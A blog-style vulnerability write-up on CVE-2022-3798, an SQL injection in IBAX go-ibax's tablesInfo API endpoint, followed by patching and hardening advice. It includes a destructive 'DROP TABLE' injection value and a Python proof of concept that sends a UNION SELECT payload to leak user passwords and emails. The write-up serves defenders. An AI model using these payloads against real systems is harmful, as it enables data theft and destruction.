In late 2022, a critical vulnerability was uncovered in IBAX go-ibax, the open-source blockchain platform. This vulnerability, tracked as CVE-2022-3798 (see at VulDB VDB-212634), allows remote attackers to perform an SQL injection through a flaw in the /api/v2/open/tablesInfo endpoint. Simply put, malicious users can craft special requests to manipulate the system’s database, steal data, and even alter or destroy records.
This post will break down what SQL injection is, describe how the attack works, and show a realistic exploit example. We'll also point you to authoritative sources for further information, and most importantly — explain how you can protect your systems.
What is SQL Injection?
SQL injection (SQLi) is a method of attacking databases through poorly designed API or web application code. When user input is not checked or sanitized, an attacker can insert ("inject") SQL commands directly into the backend queries, causing the system to do things the developers never intended, like leaking sensitive data.
The Vulnerability in IBAX go-ibax
Affected Product: IBAX go-ibax
Vulnerable Endpoint: /api/v2/open/tablesInfo
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reference: VulDB VDB-212634
The /api/v2/open/tablesInfo endpoint is meant to fetch database table metadata — a handy feature for users. But, in this case, the code processes certain user input values directly into an SQL statement, without filtering out bad (malicious) input.
Suppose the API takes a parameter (e.g., table) to display information about a certain table
POST /api/v2/open/tablesInfo HTTP/1.1
Host: victim-ibax-node.com
Content-Type: application/json
{
"table": "members"
}
An attacker could send
{
"table": "members; DROP TABLE transactions; --"
}
If the code inserts that string directly into an SQL statement, it could execute "DROP TABLE transactions;"—deleting important records, or worse.
Here’s a PoC that sends a malicious payload to the vulnerable endpoint
import requests
url = "http://victim-ibax-node.com/api/v2/open/tablesInfo";
headers = {"Content-Type": "application/json"}
# SQL Injection payload: Try exposing all users' data
payload = {
"table": "users WHERE 1=1 UNION SELECT id, name, password, email FROM users --"
}
response = requests.post(url, json=payload, headers=headers)
print(response.status_code)
print(response.text)
What does this payload do?
It tricks the server into running an extra SQL command that can leak user data. The attacker could further tailor this for data deletion, privilege escalation, or more.
Public Disclosure and Exploit Status
The initial report was added to VulDB as VDB-212634 and a public exploit is available on GitHub and security mailing lists.
- CVE-2022-3798 Info on VulDB
- NVD Detail
Because the exploit is trivially easy and can be run remotely, administrators are urged to patch immediately or apply workarounds (see below).
Update Your Software:
Upgrade to the latest go-ibax version ASAP.
All parameters sent to backend or database functions should be checked and sanitized.
- In Go: use database/sql with ? placeholders.
Limit Database Privileges:
Run your database with the least privilege. Avoid root or admin connections from the API where possible.
Monitor Logs:
Check for suspicious requests to /api/v2/open/tablesInfo.
Links to Original References
- CVE-2022-3798 at NVD
- VulDB Entry VDB-212634
- IBAX go-ibax GitHub Project
- Common SQL Injection Prevention Techniques (OWASP)
Conclusion
CVE-2022-3798 in IBAX go-ibax lets attackers run arbitrary SQL against your node’s database. With exploits already public, this bug is a sitting duck—patch immediately. Watch your logs, sanitize all inputs, and always use prepared statements. Share this info with your admin team to help keep your blockchain node, and community, safe!
Timeline
Published on: 11/01/2022 16:15:00 UTC
Last modified on: 11/02/2022 15:03:00 UTC